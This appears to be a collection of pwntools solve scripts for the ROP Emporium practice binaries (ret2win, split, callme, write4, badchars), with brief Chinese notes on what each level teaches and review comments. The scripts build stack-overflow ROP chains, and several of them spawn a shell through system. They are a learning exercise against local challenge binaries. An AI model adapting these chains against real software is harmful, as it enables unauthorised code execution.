##ret2win
from pwn import *
# ret2win solve: 40 bytes of filler followed by one return address.
# NOTE(review): str literals are concatenated with p64() output, which is
# bytes; that only works on Python 2 pwntools — under Python 3 the literals
# would need a b'' prefix.
p = process('./ret2win')   # spawn the local binary from the current directory
# Hard-coded for this specific build of the binary. The name says "system",
# but what actually lives at 0x400824 cannot be verified from this script —
# confirm against the binary's disassembly before reusing.
system_addr = 0x0400824
# 0x20 (32) filler bytes plus 8 more ('deadbeef') = 40 bytes, presumably the
# local buffer plus the saved rbp, so the following 8 bytes land on the saved
# return address.
pad = 'a'*0x20+'deadbeef'
payload = pad+p64(system_addr)   # p64: 8-byte little-endian encoding
p.sendline(payload)
p.interactive()   # hand the pty over to the user once the chain has run
##split
考察将字符串通过寄存器传入函数当中，要熟练掌握 x86 与 x64 的传参规律。
from pwn import *
# split solve: one-argument call via a pop rdi gadget.
# NOTE(review): str/bytes concatenation assumes Python 2 pwntools; under
# Python 3 the literal padding would need a b'' prefix.
p = process('./split')
#elf = ELF('./split')
# All addresses below are hard-coded for this build of the binary; the
# commented-out ELF lines show how they could be resolved from symbols instead.
system_addr = 0x00400810
#system_addr = elf.symbols['system']
cat_flag_addr = 0x00601060   # presumably the address of a string in the binary (name only) — confirm
pop_rdi_ret = 0x00400883     # gadget that loads the first x86-64 SysV argument register
pad = 'A'*40                 # 40 bytes up to the saved return address (buffer + saved rbp, presumably)
# Chain: pop rdi ; ret  <-  cat_flag_addr  ->  system(rdi)
payload = pad+p64(pop_rdi_ret)+p64(cat_flag_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()
##callme
对参数传递的考察
from pwn import *
# callme solve: three calls, each with the same three integer arguments.
# NOTE(review): str/bytes concatenation assumes Python 2 pwntools.
context.log_level = 'debug'   # print every byte sent/received
p = process('./callme')
elf = ELF('./callme')         # loaded but not used below
# info
# gadget
pppr = 0x0000000000401ab0 # pop rdi ; pop rsi ; pop rdx ; ret
# Each of the three pops is a one-byte instruction, so pppr+3 is the bare ret.
callme_three = 0x401810
callme_two = 0x401870
callme_one = 0x401850
# rop1
offset = 40                 # bytes up to the saved return address (presumably buffer + saved rbp)
payload = '\0'*offset       # NUL filler
# Bare ret first; a lone ret is the usual stack-alignment fix — confirm that is the reason here.
payload += p64(pppr+3)
# rdi=1, rsi=2, rdx=3 then call; repeated for one, two, three in that order.
payload += p64(pppr) + p64(1) + p64(2) + p64(3) + p64(callme_one)
payload += p64(pppr) + p64(1) + p64(2) + p64(3) + p64(callme_two)
payload += p64(pppr) + p64(1) + p64(2) + p64(3) + p64(callme_three)
# debug()
p.recvuntil('>')            # wait for the program's prompt before sending
p.sendline(payload)
p.interactive()
##write4
考察通过将字符串写入.bss段来将字符串传递给system函数然后getshell,同时考察gadget的选取与对段的理解。
from pwn import *
# write4 solve: stage an 8-byte string into writable memory with a
# register-to-memory store gadget, then pass its address as the argument.
# NOTE(review): str/bytes concatenation assumes Python 2 pwntools.
context.log_level = 'debug'
p = process('./write4')
# Hard-coded for this build of the binary; gadget semantics below are taken
# from the variable names, not verified here.
sys_addr = 0x00400810
bss_addr = 0x601060          # writable .bss location used as scratch space
mov_r14_r15 = 0x400820       # presumably mov [r14], r15 ; ret
pop_r14_r15 = 0x400890       # presumably pop r14 ; pop r15 ; ret
pop_rdi = 0x400893           # presumably pop rdi ; ret
payload = 'a'*(0x20+8)       # 0x20-byte buffer + 8-byte saved rbp
payload += p64(pop_r14_r15) # load r14 and r15 from the next two stack slots (author's note: "clear registers")
payload += p64(bss_addr) # r14 = .bss address
payload += "/bin/sh".ljust(8,"\x00") # r15 = "/bin/sh\0", padded to exactly one 8-byte slot
payload += p64(mov_r14_r15) # store r15 into memory at r14 (the string now lives in .bss)
payload += p64(pop_rdi) # load rdi from the next stack slot
payload += p64(bss_addr) # rdi = address of the string just written
payload += p64(sys_addr) # call with rdi as the argument
p.recvuntil('>')
p.sendline(payload)
p.recv()                     # drain whatever the program prints next
p.interactive()
##badchars
from pwn import *
# badchars solve: same store-to-memory idea as write4, but the input is
# filtered, so the author picks a command string that avoids the bad bytes.
# NOTE(review): str/bytes concatenation assumes Python 2 pwntools.
p = process('./badchars')
elf = ELF('./badchars')
context.log_level = 'debug'
# gadget  (semantics per the disassembly listing below)
prdi = 0x400b39              # pop rdi ; ret
p1213 = 0x400b3b             # pop r12 ; pop r13 ; ret
m1213 = 0x400b34             # mov [r13], r12 ; ret
system = 0x04009E8           # hard-coded; the PLT alternative is commented out
#system = elf.plt['system']
p1415 = 0x400b40             # pop r14 ; pop r15 ; ret   (unused below)
x1415 = 0x400b30             # xor byte [r15], r14b ; ret (unused below)
'''
0x400b30 <usefulGadgets>: xor BYTE PTR [r15],r14b
0x400b33 <usefulGadgets+3>: ret
0x400b34 <usefulGadgets+4>: mov QWORD PTR [r13+0x0],r12
0x400b38 <usefulGadgets+8>: ret
0x400b39 <usefulGadgets+9>: pop rdi
=> 0x400b3a <usefulGadgets+10>: ret
0x400b3b <usefulGadgets+11>: pop r12
0x400b3d <usefulGadgets+13>: pop r13
0x400b3f <usefulGadgets+15>: ret
0x400b40 <usefulGadgets+16>: pop r14
0x400b42 <usefulGadgets+18>: pop r15
0x400b44 <usefulGadgets+20>: ret
'''
# rop1
offset = 40                  # bytes up to the saved return address
payload = 'A'*offset
# filtered: bic/ fns
# $0 is okay, but use gadget x1415 to get /bin/sh via xor is the goal (too lazy to write exp)
# The intended route (xor-decoding "/bin/sh" in place with x1415) is not
# implemented; "$0" is used instead because it contains none of the filtered
# characters listed above.
# r12 = "$0" NUL-padded to 8 bytes, r13 = scratch address in .bss (+0x400 to
# stay clear of whatever sits at the start of .bss), then store r12 at [r13].
payload += p64(p1213) + '$0\0\0\0\0\0\0' + p64(elf.bss()+0x400) + p64(m1213)
# rdi = address of the stored string, then the call.
payload += p64(prdi) + p64(elf.bss()+0x400) + p64(system)
# debug()
p.recvuntil('>')
p.sendline(payload)
p.interactive()